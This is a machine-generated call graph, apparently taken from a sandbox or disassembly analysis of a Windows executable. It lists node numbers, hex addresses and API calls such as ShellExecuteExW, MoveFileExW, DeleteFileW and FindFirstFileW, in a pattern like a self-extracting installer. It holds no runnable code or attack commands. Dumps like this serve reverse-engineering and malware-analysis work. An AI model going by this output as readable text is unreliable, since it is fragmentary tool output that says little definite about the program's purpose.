22166->22167 22168 44d17b LoadStringW 22166->22168 22169 44d1a3 22167->22169 22168->22167 22168->22169 22170 44c91f 52 API calls 22169->22170 22171 44d1b1 SetDlgItemTextW 22170->22171 22172 4412c2 GetDlgItem ShowWindow 22171->22172 22172->22091 22174 45aa4f __EH_prolog 22173->22174 22175 45a14a 22174->22175 22439 4596ec 22174->22439 22175->22102 22178 4596ec ExpandEnvironmentStringsW 22187 45aa86 _wcsrchr 22178->22187 22179 45ad86 SetWindowTextW 22179->22187 22184 45ab77 SetFileAttributesW 22186 45ac32 GetFileAttributesW 22184->22186 22192 45ab6a ___scrt_fastfail 22184->22192 22189 45ac40 DeleteFileW 22186->22189 22186->22192 22187->22175 22187->22178 22187->22179 22191 45af50 GetDlgItem SetWindowTextW SendMessageW 22187->22191 22187->22192 22195 45af92 SendMessageW 22187->22195 22443 450b12 CompareStringW 22187->22443 22444 458b8e GetCurrentDirectoryW 22187->22444 22445 44a1a9 7 API calls 22187->22445 22448 44a132 FindClose 22187->22448 22449 459844 69 API calls new 22187->22449 22450 4620de 22187->22450 22189->22192 22191->22187 22192->22184 22192->22186 22192->22187 22193 443f5b _swprintf 51 API calls 22192->22193 22446 44b100 52 API calls 2 library calls 22192->22446 22447 44a1a9 7 API calls 22192->22447 22194 45ac75 GetFileAttributesW 22193->22194 22194->22192 22196 45ac86 MoveFileW 22194->22196 22195->22187 22196->22192 22197 45ac9e MoveFileExW 22196->22197 22197->22192 22199 45bc82 __EH_prolog 22198->22199 22474 44f165 69 API calls 22199->22474 22201 45bcb3 22475 445bb7 69 API calls 22201->22475 22203 45bcd1 22476 447b10 74 API calls 2 library calls 22203->22476 22205 45bd15 22477 447c84 22205->22477 22207 45bd24 22486 447ba0 22207->22486 22211 45b8c9 22210->22211 23015 458ac0 22211->23015 22214 45a236 22214->21970 22214->21971 22215 45b8d6 GetWindow 22215->22214 22221 45b8f2 22215->22221 22216 45b8ff GetClassNameW 23020 450b12 CompareStringW 22216->23020 22218 45b927 GetWindowLongW 22219 45b988 GetWindow 22218->22219 22220 45b937 SendMessageW 22218->22220 22219->22214 22219->22221 22220->22219 22222 45b94d GetObjectW 22220->22222 22221->22214 22221->22216 22221->22218 22221->22219 23021 458b22 GetDC GetDeviceCaps ReleaseDC 22222->23021 22224 45b962 23022 458adf GetDC GetDeviceCaps ReleaseDC 22224->23022 23023 458cf3 8 API calls ___scrt_fastfail 22224->23023 22227 45b972 SendMessageW DeleteObject 22227->22219 22228->21984 22230 45900e 22229->22230 22231 458fe9 22229->22231 22233 459013 SHAutoComplete 22230->22233 22234 45901c 22230->22234 23026 450b12 CompareStringW 22231->23026 22233->22234 22237 459485 22234->22237 22235 458ffc 22235->22230 22236 459000 FindWindowExW 22235->22236 22236->22230 22238 45948f __EH_prolog 22237->22238 22239 44137e 75 API calls 22238->22239 22240 4594b1 22239->22240 23027 441edd 22240->23027 22243 4594cb 22245 44162e 79 API calls 22243->22245 22244 4594da 22246 4418f6 127 API calls 22244->22246 22247 4594d6 22245->22247 22249 4594fc __vswprintf_c_l new 22246->22249 22247->22011 22247->22015 22248 44162e 79 API calls 22248->22247 22249->22248 22250->21993 22251->22071 22252->22096 22253->22101 22254->22106 22255->22112 22257->22046 22258->22061 22259->22043 22260->22033 22280 44c88e 22261->22280 22263 44cefd GetWindowRect GetClientRect 22264 44cff2 22263->22264 22271 44cf57 22263->22271 22265 44d034 GetSystemMetrics GetWindow 22264->22265 22266 44cffc GetWindowTextW 22264->22266 22268 44d054 22265->22268 22283 44c91f 22266->22283 22269 441312 22268->22269 22273 44d060 GetWindowTextW 22268->22273 22275 44c91f 52 API calls 22268->22275 22276 44d0a6 GetWindowRect 22268->22276 22277 44d11b GetWindow 22268->22277 22269->22124 22269->22127 22270 44d028 SetWindowTextW 22270->22265 22271->22265 22272 44cfb8 GetWindowLongW 22271->22272 22274 44cfe2 GetWindowRect 22272->22274 22273->22268 22274->22264 22278 44d093 SetWindowTextW 22275->22278 22276->22277 22277->22268 22277->22269 22278->22268 22279->22124 22281 44c91f 52 API calls 22280->22281 22282 44c8b6 _wcschr 22281->22282 22282->22263 22284 44c929 22283->22284 22287 44c99d _strlen 22284->22287 22290 44c9fb _wcschr _wcsrchr 22284->22290 22291 450905 WideCharToMultiByte 22284->22291 22292 450905 WideCharToMultiByte 22287->22292 22288 44c9c8 _strlen 22289 443f5b _swprintf 51 API calls 22288->22289 22289->22290 22290->22270 22291->22287 22292->22288 22294 449e93 22293->22294 22295 449eb7 22294->22295 22296 449eaa CreateDirectoryW 22294->22296 22306 449dff 22295->22306 22296->22295 22298 449eea 22296->22298 22303 449ef9 22298->22303 22319 44a0c3 22298->22319 22300 449efd GetLastError 22300->22303 22303->22140 22304 449ed3 22304->22300 22305 449ed7 CreateDirectoryW 22304->22305 22305->22298 22305->22300 22327 449e13 22306->22327 22309 44b275 22310 44b282 22309->22310 22318 44b28c 22310->22318 22337 44b40f CharUpperW 22310->22337 22312 44b29b 22338 44b43b CharUpperW 22312->22338 22314 44b2aa 22315 44b325 GetCurrentDirectoryW 22314->22315 22316 44b2ae 22314->22316 22315->22318 22339 44b40f CharUpperW 22316->22339 22318->22304 22320 45cec0 22319->22320 22321 44a0d0 SetFileAttributesW 22320->22321 22322 44a0e6 22321->22322 22323 44a113 22321->22323 22324 44b275 2 API calls 22322->22324 22323->22303 22325 44a0fa 22324->22325 22325->22323 22326 44a0fe SetFileAttributesW 22325->22326 22326->22323 22335 45cec0 22327->22335 22330 449e31 22332 44b275 2 API calls 22330->22332 22331 449e08 22331->22300 22331->22309 22333 449e45 22332->22333 22333->22331 22334 449e49 GetFileAttributesW 22333->22334 22334->22331 22336 449e20 GetFileAttributesW 22335->22336 22336->22330 22336->22331 22337->22312 22338->22314 22339->22318 22341 443f45 __vswprintf_c_l 22340->22341 22344 4634dd 22341->22344 22347 4621bb 22344->22347 22348 4621e3 22347->22348 22349 4621fb 22347->22349 22364 465e3e 20 API calls __dosmaperr 22348->22364 22349->22348 22351 462203 22349->22351 22366 462636 22351->22366 22352 4621e8 22365 465d1d 26 API calls pre_c_initialization 22352->22365 22355 4621f3 22357 45d783 TranslatorGuardHandler 5 API calls 22355->22357 22359 443f4f 22357->22359 22359->22066 22360 46228b 22375 46283c 51 API calls 3 library calls 22360->22375 22363 462296 22376 4626b9 20 API calls _free 22363->22376 22364->22352 22365->22355 22367 462653 22366->22367 22373 462213 22366->22373 22367->22373 22377 46631f GetLastError 22367->22377 22369 462674 22397 46646e 38 API calls __fassign 22369->22397 22371 46268d 22398 46649b 38 API calls __fassign 22371->22398 22374 462601 20 API calls 2 library calls 22373->22374 22374->22360 22375->22363 22376->22355 22378 466335 22377->22378 22379 46633b 22377->22379 22399 4678f8 11 API calls 2 library calls 22378->22399 22383 46638a SetLastError 22379->22383 22400 465a8d 22379->22400 22383->22369 22386 46636a 22387 466371 22386->22387 22388 466355 22386->22388 22414 466191 20 API calls __dosmaperr 22387->22414 22407 4659c2 22388->22407 22389 46635b 22391 466396 SetLastError 22389->22391 22415 465a4a 38 API calls _abort 22391->22415 22392 46637c 22394 4659c2 _free 20 API calls 22392->22394 22396 466383 22394->22396 22396->22383 22396->22391 22397->22371 22398->22373 22399->22379 22401 465a9a __dosmaperr 22400->22401 22402 465ada 22401->22402 22403 465ac5 RtlAllocateHeap 22401->22403 22416 4646ca 7 API calls 2 library calls 22401->22416 22417 465e3e 20 API calls __dosmaperr 22402->22417 22403->22401 22405 465ad8 22403->22405 22405->22388 22413 46794e 11 API calls 2 library calls 22405->22413 22408 4659cd RtlFreeHeap 22407->22408 22409 4659f6 __dosmaperr 22407->22409 22408->22409 22410 4659e2 22408->22410 22409->22389 22418 465e3e 20 API calls __dosmaperr 22410->22418 22412 4659e8 GetLastError 22412->22409 22413->22386 22414->22392 22416->22401 22417->22405 22418->22412 22420 4495f3 22419->22420 22421 4495f7 22419->22421 22420->22162 22421->22420 22430 449dac 22421->22430 22425 4494cd 22424->22425 22426 4494af 22424->22426 22427 4494ec 22425->22427 22438 446d80 67 API calls 22425->22438 22426->22425 22428 4494bb CloseHandle 22426->22428 22427->22162 22428->22425 22431 45cec0 22430->22431 22432 449db9 DeleteFileW 22431->22432 22433 449611 22432->22433 22434 449dcc 22432->22434 22433->22162 22435 44b275 2 API calls 22434->22435 22436 449de0 22435->22436 22436->22433 22437 449de4 DeleteFileW 22436->22437 22437->22433 22438->22427 22440 4596f6 22439->22440 22441 4597a9 ExpandEnvironmentStringsW 22440->22441 22442 4597cc 22440->22442 22441->22442 22442->22187 22443->22187 22444->22187 22445->22187 22446->22192 22447->22192 22448->22187 22449->22187 22451 465aea 22450->22451 22452 465af7 22451->22452 22453 465b02 22451->22453 22463 4659fc 22452->22463 22455 465b0a 22453->22455 22461 465b13 __dosmaperr 22453->22461 22456 4659c2 _free 20 API calls 22455->22456 22459 465aff 22456->22459 22457 465b3d RtlReAllocateHeap 22457->22459 22457->22461 22458 465b18 22470 465e3e 20 API calls __dosmaperr 22458->22470 22459->22187 22461->22457 22461->22458 22471 4646ca 7 API calls 2 library calls 22461->22471 22464 465a3a 22463->22464 22468 465a0a __dosmaperr 22463->22468 22473 465e3e 20 API calls __dosmaperr 22464->22473 22465 465a25 RtlAllocateHeap 22467 465a38 22465->22467 22465->22468 22467->22459 22468->22464 22468->22465 22472 4646ca 7 API calls 2 library calls 22468->22472 22470->22459 22471->22461 22472->22468 22473->22467 22474->22201 22475->22203 22476->22205 22478 447c8e 22477->22478 22483 447cf8 22478->22483 22512 44a145 22478->22512 22480 447da4 22480->22207 22482 447d62 22482->22480 22518 446d0d 67 API calls 22482->22518 22483->22482 22484 44a145 8 API calls 22483->22484 22490 44820b 22483->22490 22484->22483 22487 447bae 22486->22487 22489 447bb5 22486->22489 22488 450e21 79 API calls 22487->22488 22488->22489 22491 448215 __EH_prolog 22490->22491 22519 44137e 22491->22519 22493 448230 22527 449ba2 22493->22527 22499 44825b 22500 44825f 22499->22500 22509 44a145 8 API calls 22499->22509 22510 4482fa 22499->22510 22651 44b6cb CompareStringW 22499->22651 22647 44162e 22500->22647 22504 44835a 22550 441e8e 22504->22550 22507 448365 22507->22500 22554 443a20 22507->22554 22564 448409 22507->22564 22509->22499 22546 4483a3 22510->22546 22513 44a15a 22512->22513 22517 44a15e 22513->22517 23003 44a273 22513->23003 22515 44a16e 22516 44a173 FindClose 22515->22516 22515->22517 22516->22517 22517->22478 22518->22480 22520 441383 __EH_prolog 22519->22520 22653 44c413 22520->22653 22522 4413ba 22526 441413 ___scrt_fastfail 22522->22526 22659 45cdae 22522->22659 22526->22493 22528 449bad 22527->22528 22530 448246 22528->22530 22684 446e66 67 API calls 22528->22684 22530->22500 22531 4419b1 22530->22531 22532 4419bb __EH_prolog 22531->22532 22539 4419fd 22532->22539 22545 4419e4 22532->22545 22685 44135c 22532->22685 22534 441b16 22688 446d0d 67 API calls 22534->22688 22536 443a20 90 API calls 22541 441b6d 22536->22541 22537 441b26 22537->22536 22537->22545 22538 441bb7 22543 441bea 22538->22543 22538->22545 22689 446d0d 67 API calls 22538->22689 22539->22534 22539->22537 22539->22545 22541->22538 22542 443a20 90 API calls 22541->22542 22542->22541 22544 443a20 90 API calls 22543->22544 22543->22545 22544->22543 22545->22499 22547 4483b0 22546->22547 22707 44ffb8 GetSystemTime SystemTimeToFileTime 22547->22707 22549 448314 22549->22504 22652 4506c8 65 API calls 22549->22652 22552 441e93 __EH_prolog 22550->22552 22551 441ec7 22551->22507 22552->22551 22709 4418f6 22552->22709 22555 443a30 22554->22555 22556 443a2c 22554->22556 22557 443a5d 22555->22557 22558 443a4f 22555->22558 22556->22507 22930 44276c 90 API calls 3 library calls 22557->22930 22563 443a8f 22558->22563 22929 443203 78 API calls 3 library calls 22558->22929 22561 443a5b 22561->22563 22931 441fd2 67 API calls 22561->22931 22563->22507 22565 448413 __EH_prolog 22564->22565 22566 44844f 22565->22566 22579 448453 22565->22579 22960 4577e7 93 API calls 22565->22960 22567 448478 22566->22567 22570 4484ff 22566->22570 22566->22579 22568 44849a 22567->22568 22567->22579 22961 447a2f 151 API calls 22567->22961 22568->22579 22962 4577e7 93 API calls 22568->22962 22570->22579 22932 445d98 22570->22932 22574 44858c 22574->22579 22940 4480f8 22574->22940 22577 4486e9 22578 44a145 8 API calls 22577->22578 22580 44874d 22577->22580 22578->22580 22579->22507 22944 447c11 22580->22944 22582 44c57d 73 API calls 22585 4487a7 _memcmp 22582->22585 22583 4488d1 22584 4489a0 22583->22584 22591 44891f 22583->22591 22589 4489fb 22584->22589 22600 4489ab 22584->22600 22585->22579 22585->22582 22585->22583 22586 4488ca 22585->22586 22963 4480a6 75 API calls 22585->22963 22964 446d0d 67 API calls 22585->22964 22965 446d0d 67 API calls 22586->22965 22599 44898f 22589->22599 22968 447f88 89 API calls 22589->22968 22590 4489f9 22593 449437 72 API calls 22590->22593 22594 449dff 4 API calls 22591->22594 22591->22599 22592 448fb5 22595 449437 72 API calls 22592->22595 22593->22579 22597 448956 22594->22597 22595->22579 22597->22599 22966 449161 89 API calls 22597->22966 22598 448a64 22598->22592 22611 448acd 22598->22611 22969 44971a 22598->22969 22599->22590 22599->22598 22600->22590 22967 447dc4 93 API calls __except_handler4 22600->22967 22601 44a6a9 8 API calls 22605 448b1c 22601->22605 22603 448aa5 22603->22611 22973 441f18 67 API calls 22603->22973 22607 44a6a9 8 API calls 22605->22607 22621 448b32 22607->22621 22609 448abb 22974 446f67 68 API calls 22609->22974 22611->22601 22612 448bd5 22613 448d22 22612->22613 22614 448c1e 22612->22614 22618 448d34 22613->22618 22619 448d48 22613->22619 22637 448c4e 22613->22637 22615 448c8e 22614->22615 22617 448c2e 22614->22617 22616 4480f8 CharUpperW 22615->22616 22622 448ca9 22616->22622 22623 448c72 22617->22623 22629 448c3c 22617->22629 22624 4490d0 120 API calls 22618->22624 22625 451fa9 68 API calls 22619->22625 22621->22612 22950 449869 22621->22950 22630 448cd2 22622->22630 22631 448cd9 22622->22631 22622->22637 22623->22637 22976 4477d4 101 API calls 22623->22976 22624->22637 22626 448d61 22625->22626 22627 451c40 120 API calls 22626->22627 22627->22637 22975 441f18 67 API calls 22629->22975 22977 447586 77 API calls __except_handler4 22630->22977 22978 44900e 85 API calls __EH_prolog 22631->22978 22635 448e6c 22635->22592 22636 448edb 22635->22636 22980 449b6a SetEndOfFile 22635->22980 22955 449a12 22636->22955 22637->22635 22979 441f18 67 API calls 22637->22979 22641 448f35 22642 4494a3 68 API calls 22641->22642 22643 448f40 22642->22643 22643->22592 22644 44a0c3 4 API calls 22643->22644 22645 448f9f 22644->22645 22645->22592 22981 441f18 67 API calls 22645->22981 22648 441640 22647->22648 23002 44c4b6 79 API calls 22648->23002 22651->22499 22652->22504 22654 44c41d __EH_prolog 22653->22654 22655 45cdae new 8 API calls 22654->22655 22656 44c460 22655->22656 22657 45cdae new 8 API calls 22656->22657 22658 44c484 22657->22658 22658->22522 22660 45cdb3 new 22659->22660 22661 441400 22660->22661 22671 4646ca 7 API calls 2 library calls 22660->22671 22672 45d83a RaiseException __CxxThrowException@8 new 22660->22672 22673 45d81d RaiseException Concurrency::cancel_current_task __CxxThrowException@8 22660->22673 22661->22526 22665 44ac66 22661->22665 22666 44ac70 __EH_prolog 22665->22666 22674 44ddc2 73 API calls 22666->22674 22668 44ac82 22675 44ad7e 22668->22675 22671->22660 22674->22668 22676 44ad90 ___scrt_fastfail 22675->22676 22679 44fce6 22676->22679 22682 44fca6 GetCurrentProcess GetProcessAffinityMask 22679->22682 22683 44acf8 22682->22683 22683->22526 22684->22530 22690 441705 22685->22690 22687 441378 22687->22539 22688->22545 22689->22543 22691 44171b 22690->22691 22702 441773 __vswprintf_c_l 22690->22702 22692 441744 22691->22692 22703 446dd3 67 API calls __vswprintf_c_l 22691->22703 22694 44179a 22692->22694 22699 441760 new 22692->22699 22696 4620de 22 API calls 22694->22696 22695 44173a 22704 446e0b 68 API calls 22695->22704 22698 4417a1 22696->22698 22698->22702 22706 446e0b 68 API calls 22698->22706 22699->22702 22705 446e0b 68 API calls 22699->22705 22702->22687 22703->22695 22704->22692 22705->22702 22706->22702 22708 44ffe8 __vswprintf_c_l 22707->22708 22708->22549 22710 4418fb __EH_prolog 22709->22710 22711 441934 22710->22711 22713 44190f 22710->22713 22714 441964 22710->22714 22712 443a20 90 API calls 22711->22712 22712->22713 22713->22551 22718 443e69 22714->22718 22722 443e72 22718->22722 22719 443a20 90 API calls 22719->22722 22720 441980 22720->22713 22723 441da1 22720->22723 22722->22719 22722->22720 22735 44f8f2 22722->22735 22724 441dab __EH_prolog 22723->22724 22743 443aa3 22724->22743 22726 441dd4 22727 441705 69 API calls 22726->22727 22734 441e5b 22726->22734 22728 441deb 22727->22728 22773 44187c 69 API calls 22728->22773 22730 441e03 22732 441e0f 22730->22732 22774 4506e9 MultiByteToWideChar 22730->22774 22775 44187c 69 API calls 22732->22775 22734->22713 22736 44f8f9 22735->22736 22737 44f914 22736->22737 22741 446dce RaiseException __CxxThrowException@8 22736->22741 22739 44f925 SetThreadExecutionState 22737->22739 22742 446dce RaiseException __CxxThrowException@8 22737->22742 22739->22722 22741->22737 22742->22739 22744 443aad __EH_prolog 22743->22744 22745 443ac3 22744->22745 22746 443adf 22744->22746 22812 446d0d 67 API calls 22745->22812 22748 443d1f 22746->22748 22751 443b0b 22746->22751 22831 446d0d 67 API calls 22748->22831 22750 443ace 22750->22726 22751->22750 22776 450be0 22751->22776 22753 443b43 22780 451fa9 22753->22780 22755 443b8c 22757 443c17 22755->22757 22772 443b83 22755->22772 22815 44c57d 22755->22815 22756 443b88 22756->22755 22814 441fb8 69 API calls 22756->22814 22793 44a6a9 22757->22793 22759 443b5a 22759->22755 22759->22756 22760 443b78 22759->22760 22813 446d0d 67 API calls 22760->22813 22761 443c2a 22766 443ca5 22761->22766 22767 443c9b 22761->22767 22821 451c40 22766->22821 22797 4490d0 22767->22797 22770 443ca3 22770->22772 22830 441f18 67 API calls 22770->22830 22808 450e21 22772->22808 22773->22730 22774->22732 22775->22734 22777 450bea __EH_prolog 22776->22777 22832 44fb02 22777->22832 22779 450cea 22779->22753 22781 451fb8 22780->22781 22783 451fc2 22780->22783 22851 446e0b 68 API calls 22781->22851 22784 452007 new 22783->22784 22785 452002 22783->22785 22792 452060 ___scrt_fastfail 22783->22792 22786 452117 22784->22786 22788 45203c 22784->22788 22784->22792 22853 4600ca RaiseException 22785->22853 22854 4600ca RaiseException 22786->22854 22852 451eca 68 API calls 3 library calls 22788->22852 22790 45213a 22792->22759 22794 44a6b6 22793->22794 22796 44a6c0 22793->22796 22795 45cdae new 8 API calls 22794->22795 22795->22796 22796->22761 22798 4490da __EH_prolog 22797->22798 22855 447c6b 22798->22855 22801 44135c 69 API calls 22802 4490ec 22801->22802 22858 44c658 22802->22858 22804 449146 22804->22770 22806 44c658 115 API calls 22807 4490fe 22806->22807 22807->22804 22807->22806 22867 44c810 91 API calls __vswprintf_c_l 22807->22867 22809 450e43 22808->22809 22877 44fc30 22809->22877 22811 450e5c 22811->22750 22812->22750 22813->22772 22814->22755 22816 44c5b0 22815->22816 22817 44c59e 22815->22817 22894 446195 73 API calls 22816->22894 22893 446195 73 API calls 22817->22893 22820 44c5a8 22820->22757 22822 451c72 22821->22822 22824 451c49 22821->22824 22829 451c66 22822->22829 22909 45421d 120 API calls 2 library calls 22822->22909 22825 451c68 22824->22825 22826 451c5e 22824->22826 22824->22829 22908 454f35 115 API calls 22825->22908 22895 455984 22826->22895 22829->22770 22830->22772 22831->22750 22848 45cdf0 22832->22848 22834 44fb0c EnterCriticalSection 22835 44fb30 22834->22835 22836 44fb4e 22834->22836 22837 45cdae new 8 API calls 22835->22837 22838 44fb95 LeaveCriticalSection 22836->22838 22839 44fb66 22836->22839 22841 44fb3a 22837->22841 22840 44fba1 22838->22840 22842 45cdae new 8 API calls 22839->22842 22840->22779 22841->22836 22849 44f930 71 API calls 22841->22849 22843 44fb70 22842->22843 22844 44fb8a LeaveCriticalSection 22843->22844 22850 44f930 71 API calls 22843->22850 22844->22840 22847 44fb88 22847->22844 22848->22834 22849->22836 22850->22847 22851->22783 22852->22792 22853->22786 22854->22790 22868 44a8e0 22855->22868 22863 44c66d __vswprintf_c_l 22858->22863 22859 44c7b7 22860 44c7df 22859->22860 22871 44c5f7 22859->22871 22862 44f8f2 2 API calls 22860->22862 22865 44c7ae 22862->22865 22863->22859 22863->22865 22875 44a791 85 API calls 22863->22875 22876 4577e7 93 API calls 22863->22876 22865->22807 22867->22807 22869 44a8f4 GetVersionExW 22868->22869 22870 447c70 22868->22870 22869->22870 22870->22801 22872 44c600 22871->22872 22874 44c651 22871->22874 22873 450680 PeekMessageW GetMessageW TranslateMessage DispatchMessageW SendDlgItemMessageW 22872->22873 22872->22874 22873->22874 22874->22860 22875->22863 22876->22863 22878 44fca2 22877->22878 22879 44fc39 EnterCriticalSection 22877->22879 22878->22811 22880 44fc75 22879->22880 22884 44fc57 22879->22884 22881 44f9d1 77 API calls 22880->22881 22882 44fc98 LeaveCriticalSection 22880->22882 22883 44fc8f 22881->22883 22882->22878 22883->22882 22884->22880 22886 44f9d1 22884->22886 22887 44fdc9 72 API calls 22886->22887 22888 44f9f3 ReleaseSemaphore 22887->22888 22889 44fa31 DeleteCriticalSection CloseHandle CloseHandle 22888->22889 22890 44fa13 22888->22890 22889->22880 22891 44fac7 70 API calls 22890->22891 22892 44fa1d CloseHandle 22891->22892 22892->22889 22892->22890 22893->22820 22894->22820 22910 4521e6 22895->22910 22897 44c658 115 API calls 22901 455995 ___BuildCatchObject __vswprintf_c_l 22897->22901 22898 455d67 22928 453ef1 92 API calls __vswprintf_c_l 22898->22928 22900 455d77 __vswprintf_c_l 22900->22829 22901->22897 22901->22898 22914 44fa67 22901->22914 22920 452b3a 115 API calls 22901->22920 22921 455db9 115 API calls 22901->22921 22922 44fdc9 22901->22922 22926 452593 92 API calls __vswprintf_c_l 22901->22926 22927 4563f2 120 API calls __vswprintf_c_l 22901->22927 22908->22829 22909->22829 22912 4521f0 __EH_prolog ___scrt_fastfail new 22910->22912 22911 4522db 22911->22901 22912->22911 22913 446e0b 68 API calls 22912->22913 22913->22912 22915 44fa73 22914->22915 22918 44fa78 22914->22918 22916 44fbb1 77 API calls 22915->22916 22916->22918 22917 44fa91 22917->22901 22918->22917 22919 44fdc9 72 API calls 22918->22919 22919->22917 22920->22901 22921->22901 22923 44fde3 ResetEvent ReleaseSemaphore 22922->22923 22924 44fe0e 22922->22924 22925 44fac7 70 API calls 22923->22925 22924->22901 22925->22924 22926->22901 22927->22901 22928->22900 22929->22561 22930->22561 22931->22563 22933 445da6 22932->22933 22982 445cc5 22933->22982 22936 445dd9 22937 445e1a 22936->22937 22938 445e11 22936->22938 22987 44a950 CharUpperW CompareStringW CompareStringW 22936->22987 22937->22938 22988 44f0e1 CompareStringW 22937->22988 22938->22574 22941 448116 22940->22941 22942 4481b7 CharUpperW 22941->22942 22943 4481ca 22942->22943 22943->22577 22945 447c20 22944->22945 22946 447c60 22945->22946 22994 446f49 67 API calls 22945->22994 22946->22585 22948 447c58 22995 446d0d 67 API calls 22948->22995 22996 449897 22950->22996 22953 449888 22953->22612 22956 449a23 22955->22956 22959 449a32 22955->22959 22957 449a29 FlushFileBuffers 22956->22957 22956->22959 22957->22959 22958 449aab SetFileTime 22958->22641 22959->22958 22960->22566 22961->22568 22962->22579 22963->22585 22964->22585 22965->22583 22966->22599 22967->22590 22968->22599 22970 449720 22969->22970 22971 449723 GetFileType 22969->22971 22970->22603 22972 449731 22971->22972 22972->22603 22973->22609 22974->22611 22975->22637 22976->22637 22977->22637 22978->22637 22979->22635 22980->22636 22981->22592 22989 445bc2 22982->22989 22985 445ce6 22985->22936 22986 445bc2 3 API calls 22986->22985 22987->22936 22988->22938 22990 445bcc 22989->22990 22992 445cb4 22990->22992 22993 44a950 CharUpperW CompareStringW CompareStringW 22990->22993 22992->22985 22992->22986 22993->22990 22994->22948 22995->22946 22999 44987d 22996->22999 23000 4498a3 22996->23000 22997 4498da SetFilePointer 22998 4498f8 GetLastError 22997->22998 22997->22999 22998->22999 22999->22953 23001 449b6a SetEndOfFile 22999->23001 23000->22997 23001->22953 23004 44a27d 23003->23004 23005 44a30d FindNextFileW 23004->23005 23006 44a29b FindFirstFileW 23004->23006 23008 44a32c 23005->23008 23009 44a318 GetLastError 23005->23009 23007 44a2b4 23006->23007 23014 44a2f1 23006->23014 23010 44b275 2 API calls 23007->23010 23008->23014 23009->23008 23011 44a2cd 23010->23011 23012 44a2e6 GetLastError 23011->23012 23013 44a2d1 FindFirstFileW 23011->23013 23012->23014 23013->23012 23013->23014 23014->22515 23024 458adf GetDC GetDeviceCaps ReleaseDC 23015->23024 23017 458ac7 23018 458ad3 23017->23018 23025 458b22 GetDC GetDeviceCaps ReleaseDC 23017->23025 23018->22214 23018->22215 23020->22221 23021->22224 23022->22224 23023->22227 23024->23017 23025->23018 23026->22235 23028 449ba2 67 API calls 23027->23028 23029 441ee9 23028->23029 23030 441eed 23029->23030 23031 4419b1 90 API calls 23029->23031 23030->22243 23030->22244 23032 441efa 23031->23032 23032->23030 23034 446d0d 67 API calls 23032->23034 23034->23030 23888 45d74a 28 API calls 2 library calls 23834 45d553 46 API calls 6 library calls 23679 45cd5c 23680 45cd66 23679->23680 23681 45cabc ___delayLoadHelper2@8 19 API calls 23680->23681 23682 45cd73 23681->23682 23787 44605e 73 API calls 23835 45995f 104 API calls 23836 45955f 71 API calls 23889 467ede 27 API calls TranslatorGuardHandler 23789 441067 75 API calls pre_c_initialization 23838 458963 GdipDisposeImage GdipFree __except_handler4 23890 461f60 RtlUnwind 23718 45b077 23720 45b07c 23718->23720 23729 45aa99 _wcsrchr 23718->23729 23719 4596ec ExpandEnvironmentStringsW 23719->23729 23720->23729 23744 45b9aa 23720->23744 23722 45b642 23724 45ad86 SetWindowTextW 23724->23729 23727 4620de 22 API calls 23727->23729 23729->23719 23729->23722 23729->23724 23729->23727 23730 45ab6a ___scrt_fastfail 23729->23730 23737 45af50 GetDlgItem SetWindowTextW SendMessageW 23729->23737 23740 45af92 SendMessageW 23729->23740 23743 450b12 CompareStringW 23729->23743 23767 458b8e GetCurrentDirectoryW 23729->23767 23768 44a1a9 7 API calls 23729->23768 23771 44a132 FindClose 23729->23771 23772 459844 69 API calls new 23729->23772 23730->23729 23731 45ab77 SetFileAttributesW 23730->23731 23733 45ac32 GetFileAttributesW 23730->23733 23738 443f5b _swprintf 51 API calls 23730->23738 23769 44b100 52 API calls 2 library calls 23730->23769 23770 44a1a9 7 API calls 23730->23770 23731->23730 23731->23733 23733->23730 23735 45ac40 DeleteFileW 23733->23735 23735->23730 23737->23729 23739 45ac75 GetFileAttributesW 23738->23739 23739->23730 23741 45ac86 MoveFileW 23739->23741 23740->23729 23741->23730 23742 45ac9e MoveFileExW 23741->23742 23742->23730 23743->23729 23746 45b9b4 ___scrt_fastfail 23744->23746 23745 45bc0c 23745->23729 23746->23745 23747 45ba9f 23746->23747 23773 450b12 CompareStringW 23746->23773 23749 449dff 4 API calls 23747->23749 23750 45bab4 23749->23750 23751 45bad3 ShellExecuteExW 23750->23751 23774 44ae20 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23750->23774 23751->23745 23753 45bae6 23751->23753 23755 45bb77 CloseHandle 23753->23755 23758 45bb21 23753->23758 23760 45bb1b ShowWindow 23753->23760 23754 45bacb 23754->23751 23756 45bb85 23755->23756 23757 45bb90 23755->23757 23776 450b12 CompareStringW 23756->23776 23757->23745 23763 45bc07 ShowWindow 23757->23763 23775 45be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23758->23775 23760->23758 23762 45bb39 23762->23755 23764 45bb4c GetExitCodeProcess 23762->23764 23763->23745 23764->23755 23765 45bb5f 23764->23765 23765->23755 23767->23729 23768->23729 23769->23730 23770->23730 23771->23729 23772->23729 23773->23747 23774->23754 23775->23762 23776->23757 23891 46d774 IsProcessorFeaturePresent 23892 45d779 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 23893 466f03 21 API calls 2 library calls 23862 460a00 6 API calls 3 library calls 23798 45d002 38 API calls 2 library calls 23839 463501 QueryPerformanceFrequency QueryPerformanceCounter 23894 46c301 21 API calls __vswprintf_c_l 23865 467216 21 API calls 23866 46ee16 CloseHandle 23077 45d611 23078 45d61d ___scrt_is_nonwritable_in_current_image 23077->23078 23103 45d126 23078->23103 23080 45d624 23082 45d64d 23080->23082 23180 45da75 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23080->23180 23087 45d68c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23082->23087 23114 46572c 23082->23114 23086 45d66c ___scrt_is_nonwritable_in_current_image 23094 45d6ec 23087->23094 23181 464760 38 API calls 5 library calls 23087->23181 23122 45db90 23094->23122 23098 45d718 23100 45d721 23098->23100 23182 464b67 28 API calls _abort 23098->23182 23183 45d29d 13 API calls 2 library calls 23100->23183 23104 45d12f 23103->23104 23184 45d8cb IsProcessorFeaturePresent 23104->23184 23106 45d13b 23185 460b66 23106->23185 23108 45d140 23109 45d144 23108->23109 23194 4655b9 23108->23194 23109->23080 23112 45d15b 23112->23080 23117 465743 23114->23117 23115 45d783 TranslatorGuardHandler 5 API calls 23116 45d666 23115->23116 23116->23086 23118 4656d0 23116->23118 23117->23115 23120 4656ff 23118->23120 23119 45d783 TranslatorGuardHandler 5 API calls 23121 465728 23119->23121 23120->23119 23121->23087 23286 45dea0 23122->23286 23124 45dba3 GetStartupInfoW 23125 45d6f2 